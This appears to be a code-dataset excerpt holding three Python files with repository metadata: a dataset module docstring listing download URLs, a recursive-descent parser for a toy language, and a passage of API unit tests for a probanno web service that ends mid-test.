Python
|
narya/datasets/__init__.py
|
JefeDryden/narya
|
e143aa675e85e6dbaac3a52bf1a8e73a990a8037
|
[
"MIT"
] | 99
|
2021-01-14T08:55:07.000Z
|
2022-03-31T21:22:04.000Z
|
narya/datasets/__init__.py
|
JefeDryden/narya
|
e143aa675e85e6dbaac3a52bf1a8e73a990a8037
|
[
"MIT"
] | 26
|
2021-01-28T01:39:57.000Z
|
2022-02-10T03:44:46.000Z
|
narya/datasets/__init__.py
|
JefeDryden/narya
|
e143aa675e85e6dbaac3a52bf1a8e73a990a8037
|
[
"MIT"
] | 35
|
2021-01-17T10:49:20.000Z
|
2022-02-26T04:26:25.000Z
|
"""
Datasets zip:
https://storage.googleapis.com/narya-bucket-1/dataset/homography_dataset.zip
https://storage.googleapis.com/narya-bucket-1/dataset/keypoints_dataset.zip
https://storage.googleapis.com/narya-bucket-1/dataset/tracking_dataset.zip
"""
| 31.375
| 76
| 0.808765
| 35
| 251
| 5.714286
| 0.371429
| 0.12
| 0.225
| 0.375
| 0.775
| 0.775
| 0.775
| 0.775
| 0.775
| 0.54
| 0
| 0.012346
| 0.031873
| 251
| 7
| 77
| 35.857143
| 0.8107
| 0.960159
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c33df6dc6b48f20def2ba31c21fb884515071026
| 36,359
|
py
|
Python
|
parse/Parser.py
|
1163710117/HelloWorld
|
c4f0e7e8ab6c1ee717b68b9fa575a11db85fdeef
|
[
"MIT"
] | null | null | null |
parse/Parser.py
|
1163710117/HelloWorld
|
c4f0e7e8ab6c1ee717b68b9fa575a11db85fdeef
|
[
"MIT"
] | 2
|
2019-07-07T11:44:55.000Z
|
2019-10-21T03:14:38.000Z
|
parse/Parser.py
|
1163710117/hit-1163710117
|
4de45bdf6dd1bd680b8fa0be18f5f3222b11ea9d
|
[
"MIT"
] | 1
|
2019-07-07T10:32:33.000Z
|
2019-07-07T10:32:33.000Z
|
# -*- coding: utf-8 -*-
class Parser():
def __init__(self):
self.indent = " "
def getNextToken(self, index):
while True:
row = self.tokens[index]
row_number = row.split("\t")[0]
des = row.split("\t")[2]
if not des[0] == "<":
type = "error"
value = des
return row_number, type, value
des = des[1:len(des) - 1]
des = des.split(",")
type = des[0]
value = des[1]
if type == 'NOTE':
self.tokens.remove(self.tokens[index])
else:
break
return row_number, type, value
def analyze(self, tokens):
self.tokens = tokens
index = 0
grade = 0
row_number, type, value = self.getNextToken(index)
if type in ('proc', 'record', 'char', 'int', 'float', 'boolean', 'string'):
index, result = self.P_func(grade, index)
return result
else:
errors = 'error: <' + type + ',' + value + '>' + '\t' + row_number
return errors
def P_func(self, grade, index):
row_number, type, value = self.getNextToken(index)
head_str = ''
for i in range(grade):
head_str += self.indent
result = head_str + 'P (' + row_number + ')' + '\n'
index1, result1 = self.D_func(grade+1, index)
index2, result2 = self.S_func(grade+1, index1)
result += result1 + result2
return index2, result
def D_func(self, grade, index):
row_number, type, value = self.getNextToken(index)
head_str = ''
for i in range(grade):
head_str += self.indent
result = head_str + 'D (' + row_number + ')' + '\n'
head_str = head_str + self.indent
if type == 'proc':
index += 1
result2 = head_str + 'proc (' + row_number + ')' + '\n'
result += result2
index, result2 = self.X_func(grade+1, index)
result += result2
index, result2 = self.C_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == 'IDN':
index += 1
result2 = head_str + 'id: ' + value + ' (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, 'IDN', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
row_number, type, value = self.getNextToken(index)
if type == '(':
index += 1
result2 = head_str + '( (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, '(', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
row_number, type, value = self.getNextToken(index)
if type == ')':
index += 1
result2 = head_str + ') (' + row_number + ')' + '\n'
result += result2
elif type in ('char', 'int', 'float', 'boolean', 'string'):
while True:
index += 1
row_number, type, value = self.getNextToken(index)
if type == ')':
index += 1
result2 = head_str + ') (' + row_number + ')' + '\n'
result += result2
break
else:
index += 1
self.Error_des(row_number, 'char, int, float, boolean, string', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
row_number, type, value = self.getNextToken(index)
if type == '{':
index += 1
result2 = head_str + '{ (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, '{', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.D_func(grade + 1, index)
result += result2
index, result2 = self.S_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == '}':
index += 1
result2 = head_str + '} (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, '}', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.D1_func(grade+1, index)
result += result2
return index, result
elif type in ('record', 'char', 'int', 'float', 'boolean', 'string'):
index, result2 = self.T_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == 'IDN':
index += 1
result2 = head_str + 'id: ' + value + '(' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, 'IDN', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
row_number, type, value = self.getNextToken(index)
if type == ';':
index += 1
result2 = head_str + '; (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ':', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.D1_func(grade+1, index)
result += result2
return index, result
else:
index += 1
self.Error_des(row_number, 'proc, char, int, float, boolean, string', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
return index, errors
def D1_func(self, grade, index):
'''
接收错误字符时返回空字符,即将错误字符当成结束符
:param grade:
:param index:
:return:
'''
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result += head_str + 'D\' (' + row_number + ')' + '\n'
head_str += self.indent
if type in ('proc', 'record', 'char', 'int', 'float', 'boolean', 'string'):
index, result2 = self.D_func(grade+1, index)
result += result2
index, result2 = self.D1_func(grade+1, index)
result += result2
return index, result
else:
return index, ''
def T_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'T (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type in ('char', 'int', 'float', 'boolean', 'string'):
index, result2 = self.X_func(grade+1, index)
result += result2
index, result2 = self.C_func(grade+1, index)
result += result2
return index, result
elif type == 'record':
index += 1
result2 = head_str + 'record (' + row_number + ')' + '\n'
result += result2
row_number, type, value = self.getNextToken(index)
if type == ':':
index += 1
result2 = head_str + ': (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ':', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
row_number, type, value = self.getNextToken(index)
if type == '{':
index += 1
result2 = head_str + '{ (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, '{', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.D_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == '}':
index += 1
result2 = head_str + '} (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, '}', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
return index, result
else:
index += 1
self.Error_des(row_number, 'char, int, float, boolean, string, record', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
def X_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'X (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type in ('char', 'int', 'float', 'boolean', 'string'):
index += 1
result2 = head_str + type + ' (' + row_number + ')' + '\n'
result += result2
return index, result
else:
index += 1
self.Error_des(row_number, 'char, int, float, boolean, string', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
def C_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'C (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == '[':
index += 1
result2 = head_str + '[ (' + row_number + ')' + '\n'
result += result2
row_number, type, value = self.getNextToken(index)
if type == 'CONST' and isinstance(eval(value), int) and eval(value) > 0:
index += 1
result2 = head_str + 'num: '+ value + '(' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, 'CONST', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
row_number, type, value = self.getNextToken(index)
if type == ']':
index += 1
result2 = head_str + '] (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ']', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.C_func(grade+1, index)
result += result2
return index, result
elif type == 'IDN':
return index, ''
else:
index += 1
self.Error_des(row_number, '[, IDN', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
def S_func(self, grade, index):
'''
当接收错误符号时返回空字符,即把错误字符当成终结符
:param grade:
:param index:
:return:
'''
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'S (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == 'IDN':
index += 1
result2 = head_str + 'id: ' + value + '(' + row_number + ')' + '\n'
result += result2
index, result2 = self.S1_func(grade+1, index)
result += result2
return index, result
elif type == 'if':
index += 1
result2 = head_str + 'if (' + row_number + ')' + '\n'
result += result2
index, result2 = self.B_func(grade + 1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == 'then':
index += 1
result2 = head_str + 'then (' + row_number + ')' + '\n'
result += result2
index, result2 = self.S_func(grade + 1, index)
result += result2
index, result2 = self.S21_func(grade+1, index)
result += result2
return index, result
else:
index += 1
self.Error_des(row_number, 'then', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
elif type == 'while':
index += 1
result2 = head_str + 'while (' + row_number + ')' + '\n'
result += result2
index, result2 = self.B_func(grade + 1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == 'do':
index += 1
result2 = head_str + 'do (' + row_number + ')' + '\n'
result += result2
index, result2 = self.S_func(grade + 1, index)
result += result2
return index, result
elif type == 'call':
index += 1
result2 = head_str + type + ' (' + row_number + ')' + '\n'
result += result2
row_number, type, value = self.getNextToken(index)
if type == 'IDN':
index += 1
result2 = head_str + type + ': ' + value + '(' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, 'IDN', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
row_number, type, value = self.getNextToken(index)
if type == '(':
index += 1
result2 = head_str + type + ' (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, '(', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.Elist_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == ')':
index += 1
result2 = head_str + type + ' (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ')', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
return index, result
else:
return index, ''
def S1_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'S\' (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == '=':
index += 1
result2 = head_str + '= (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == ';':
index += 1
result2 = head_str + '; (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ':', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.S_func(grade+1, index)
result += result2
return index, result
elif type == '[':
index += 1
result2 = head_str + '[ (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == ']':
index += 1
result2 = head_str + '] (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ']', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.L1_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == '=':
index += 1
result2 = head_str + '= (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, '=', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.E_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == ';':
index += 1
result2 = head_str + '; (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ':', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.S_func(grade + 1, index)
result += result2
return index, result
else:
index += 1
self.Error_des(row_number, '=, [', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
def S21_func(self, grade, index):
'''
错误字符当做终结符
:param grade:
:param index:
:return:
'''
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + '\'S\' (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == 'else':
index += 1
result2 = head_str + 'else (' + row_number + ')' + '\n'
result += result2
index, result2 = self.S_func(grade+1, index)
result += result2
return index, result
else:
return index, ''
def E_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'E (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == '-':
index += 1
result2 = head_str + '- (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade + 1, index)
result += result2
index, result2 = self.E1_func(grade + 1, index)
result += result2
return index, result
elif type == '(':
index += 1
result2 = head_str + '( (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade + 1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == ')':
index += 1
result2 = head_str + ') (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ')', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.E1_func(grade + 1, index)
result += result2
return index, result
elif type == 'CONST':
index += 1
result2 = head_str + 'const: ' + value + '(' + row_number + ')' + '\n'
result += result2
index, result2 = self.E1_func(grade+1, index)
result += result2
return index, result
elif type == 'IDN':
index += 1
result2 = head_str + 'id: ' + value + '(' + row_number + ')' + '\n'
result += result2
index, result2 = self.E2_func(grade+1, index)
result += result2
return index, result
else:
index += 1
self.Error_des(row_number, '-, (, CONST, IDN', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
def E2_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'E\'\' (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == '+':
index += 1
result2 = head_str + '+ (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade+1, index)
result += result2
index, result2 = self.E1_func(grade+1, index)
result += result2
return index, result
elif type == '*':
index += 1
result2 = head_str + '* (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade + 1, index)
result += result2
index, result2 = self.E1_func(grade + 1, index)
result += result2
return index, result
elif type == '-':
index += 1
result2 = head_str + '- (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade + 1, index)
result += result2
index, result2 = self.E1_func(grade + 1, index)
result += result2
return index, result
elif type == '[':
index += 1
result2 = head_str + '[ (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade + 1, index)
row_number, type, value = self.getNextToken(index)
if type == ']':
index += 1
result2 = head_str + '[ (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ']', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.L1_func(grade+1, index)
result += result2
index, result2 = self.E1_func(grade+1, index)
result += result2
return index, result
else:
return index, ''
def E1_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'E\' (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == '+':
index += 1
result2 = head_str + '+ (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade+1, index)
result += result2
index, result2 = self.E1_func(grade+1, index)
result += result2
return index, result
elif type == '*':
index += 1
result2 = head_str + '* (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade + 1, index)
result += result2
index, result2 = self.E1_func(grade + 1, index)
result += result2
return index, result
else:
return index, ''
def L_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'L (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == 'IDN':
index += 1
result2 = head_str + 'id: ' + value + '(' + row_number + ')' + '\n'
result += result2
row_number, type, value = self.getNextToken(index)
if type == '[':
index += 1
result2 = head_str + '[ (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, '[', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.E_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == ']':
index += 1
result2 = head_str + '] (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ']', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.L1_func(grade+1, index)
result += result2
return index, result
else:
index += 1
self.Error_des(row_number, 'IDN', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
def L1_func(self, grade, index):
'''
当接收错误符号时返回空字符,即把错误字符当成终结符
:param grade:
:param index:
:return:
'''
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'L\' (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == '[':
index += 1
result2 = head_str + '[ (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == ']':
index += 1
result2 = head_str + '] (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ']', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.L1_func(grade+1, index)
result += result2
return index, result
else:
return index, ''
def B_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'B (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == '!':
index += 1
result2 = head_str + '! (' + row_number + ')' + '\n'
result += result2
index, result2 = self.B_func(grade + 1, index)
result += result2
index, result2 = self.B1_func(grade+1, index)
result += result2
return index, result
elif type == '(':
index += 1
result2 = head_str + '( (' + row_number + ')' + '\n'
result += result2
index, result2 = self.B_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type == ')':
index += 1
result2 = head_str + ') (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, ')', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.B1_func(grade+1, index)
result += result2
return index, result
elif type in ('-', '(', 'IDN', 'CONST'):
index, result2 = self.E_func(grade+1, index)
result += result2
row_number, type, value = self.getNextToken(index)
if type in ('<', '<=', '==', '!=', '>', '>='):
index += 1
result2 = head_str + type + ' (' + row_number + ')' + '\n'
result += result2
else:
index += 1
self.Error_des(row_number, '<, <=, ==, !=, >, >=', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
index, result2 = self.E_func(grade+1, index)
result += result2
index, result2 = self.B1_func(grade+1, index)
result += result2
return index, result
elif type == 'CONST' and value == '"true"':
index += 1
result2 = head_str + type + ': ' + value + '(' + row_number + ')' + '\n'
result += result2
index, result2 = self.B1_func(grade+1, index)
result += result2
return index, result
elif type == 'CONST' and value == '"false"':
index += 1
result2 = head_str + type + ': ' + value + '(' + row_number + ')' + '\n'
result += result2
index, result2 = self.B1_func(grade+1, index)
else:
index += 1
self.Error_des(row_number, '!, (, -, IDN, CONST', type)
errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
result += errors
return index, result
def B1_func(self, grade, index):
'''
错误字符当终结符
:param grade:
:param index:
:return:
'''
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'B\' (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == '||':
index += 1
result2 = head_str + type + ' (' + row_number + ')' + '\n'
result += result2
index, result2 = self.B_func(grade+1, index)
result += result2
index, result2 = self.B1_func(grade+1, index)
result += result2
return index, result
elif type == '&&':
index += 1
result2 = head_str + type + ' (' + row_number + ')' + '\n'
result += result2
index, result2 = self.B_func(grade + 1, index)
result += result2
index, result2 = self.B1_func(grade + 1, index)
result += result2
return index, result
else:
return index, ''
def Elist_func(self, grade, index):
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'Elist (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type in ('-', '(', 'IDN', 'CONST'):
index, result2 = self.E_func(grade + 1, index)
result += result2
index, result2 = self.Elist1_func(grade + 1, index)
result += result2
return index, result
else:
return index, ''
def Elist1_func(self, grade, index):
'''
把错误字符当终结符
:param grade:
:param index:
:return:
'''
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result2 = head_str + 'Elist\' (' + row_number + ')' + '\n'
result += result2
head_str += self.indent
if type == ',':
index += 1
result2 = head_str + type + ' (' + row_number + ')' + '\n'
result += result2
index, result2 = self.E_func(grade+1, index)
result += result2
index, result2 = self.Elist1_func(grade+1, index)
result += result2
return index, result
else:
return index, ''
def Error_des(self, row_number, expect_value, real_value):
des = "此处期望'" + expect_value + "',但实际出现'" + real_value + "',处理方法:文法读取终止"
error_des = "Error at Line [" + str(row_number) + "]: [" + des + "]"
print(error_des)
| 36.800607
| 93
| 0.450397
| 3,560
| 36,359
| 4.45927
| 0.028652
| 0.113953
| 0.078488
| 0.074583
| 0.943181
| 0.928315
| 0.92422
| 0.918488
| 0.917039
| 0.908724
| 0
| 0.023627
| 0.416788
| 36,359
| 987
| 94
| 36.837893
| 0.725018
| 0.009626
| 0
| 0.860116
| 0
| 0
| 0.046773
| 0
| 0.001156
| 0
| 0
| 0
| 0
| 1
| 0.025434
| false
| 0
| 0
| 0
| 0.123699
| 0.001156
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c34a5ef2ecb12157c6357b1cc9ffba018bbf96f0
| 26,794
|
py
|
Python
|
test/api_tests.py
|
kingb12/flask_probanno
|
c0c57d3bac987eebc037ac21903c85ac628705a1
|
[
"MIT"
] | null | null | null |
test/api_tests.py
|
kingb12/flask_probanno
|
c0c57d3bac987eebc037ac21903c85ac628705a1
|
[
"MIT"
] | null | null | null |
test/api_tests.py
|
kingb12/flask_probanno
|
c0c57d3bac987eebc037ac21903c85ac628705a1
|
[
"MIT"
] | null | null | null |
import requests
import unittest
import json
import uuid
from flask_probanno import GET, POST, PUT
from controllers.probanno_management import CALCULATE_PROBANNO_JOB
from controllers.job import COMPLETE
BASE_URL = "http://probannoweb.systemsbiology.net/api"
HEADERS = {'cache-control': 'no-cache'}
FASTA_1 = '267377'
CACHED_FASTA = '243232'
CACHED_FASTA_NAME = 'Methanocaldococcus jannaschii (strain ATCC 43067 / DSM 2661 / JAL-1 / JCM 10045 / NBRC 100440)'
NOT_A_FASTA = 'abcdef'
MY_FASTA_NAME = 'my_sequence'
TEST_MODEL_FILE = 'maripaludis_model.json'
GAPFILL_MODEL_JOB = "gapfill_model"
class TestSessionMethods(unittest.TestCase):
def test_get_session(self):
try:
session = make_and_unpack_request("/session", GET, HEADERS)
# exception below indicates failure
my_uuid = uuid.UUID(session)
finally:
clear_session_values(session, clear_session=True)
class TestProbannoMethods(unittest.TestCase):
def test_calculate_likelihoods_get(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# un-cached
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session), params={"fasta_id": FASTA_1})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == FASTA_1
# cached
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session), params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# 404 FASTA not found
response = make_api_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": NOT_A_FASTA})
assert response.status_code == 404
# 400 No session
response = make_api_request("/probanno/calculate", GET, HEADERS,
params={"fasta_id": FASTA_1})
# 400 bad session
response = make_api_request("/probanno/calculate", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_calculate_likelihoods_put(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# remove any values that would have been cached
files = {'fasta': open('267377.fasta', 'rb')}
data = {'fasta_id': MY_FASTA_NAME}
# un-cached
job = make_and_unpack_request("/probanno/calculate", PUT, authorize_headers(session), files=files, data=data)
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == MY_FASTA_NAME
# 400 no FASTA
response = make_api_request("/probanno/calculate", PUT, authorize_headers(session),
data=data)
# 400 no FASTA_ID
response = make_api_request("/probanno/calculate", PUT, authorize_headers(session),
files=files)
assert response.status_code == 400
# 400 No session
response = make_api_request("/probanno/calculate", PUT, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno/calculate", PUT, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_get_likelihoods(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/probanno", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(response.status_code == 404)
# cached: populate it for our session
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check retrieval
result = make_and_unpack_request("/probanno", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(type(result) == list)
# 400 No session
response = make_api_request("/probanno", GET, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/probanno", GET, authorize_headers(str(uuid.uuid4())),
params={"fasta_id": FASTA_1})
assert response.status_code == 400
response = make_api_request("/probanno", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/probanno", GET, authorize_headers(session),
params={"fasta_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_list_likelihoods(self):
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
result = make_and_unpack_request("/probanno/list", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(len(result) == 0 and type(result) == list)
# cached: populate it for our session
job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert job['sid'] == session
assert job['job'] == CALCULATE_PROBANNO_JOB
assert job['target'] == CACHED_FASTA
assert job['status'] == COMPLETE
# Now actually check retrieval
result = make_and_unpack_request("/probanno/list", GET, authorize_headers(session),
params={"fasta_id": CACHED_FASTA})
assert(type(result) == list)
assert(len(result) == 1)
assert(type(result[0]) == dict)
assert(result[0]['name'] == CACHED_FASTA_NAME)
assert(result[0]['fasta_id'] == CACHED_FASTA)
# 400 No session
response = make_api_request("/probanno/list", GET, HEADERS,
params={"fasta_id": FASTA_1})
assert response.status_code == 400
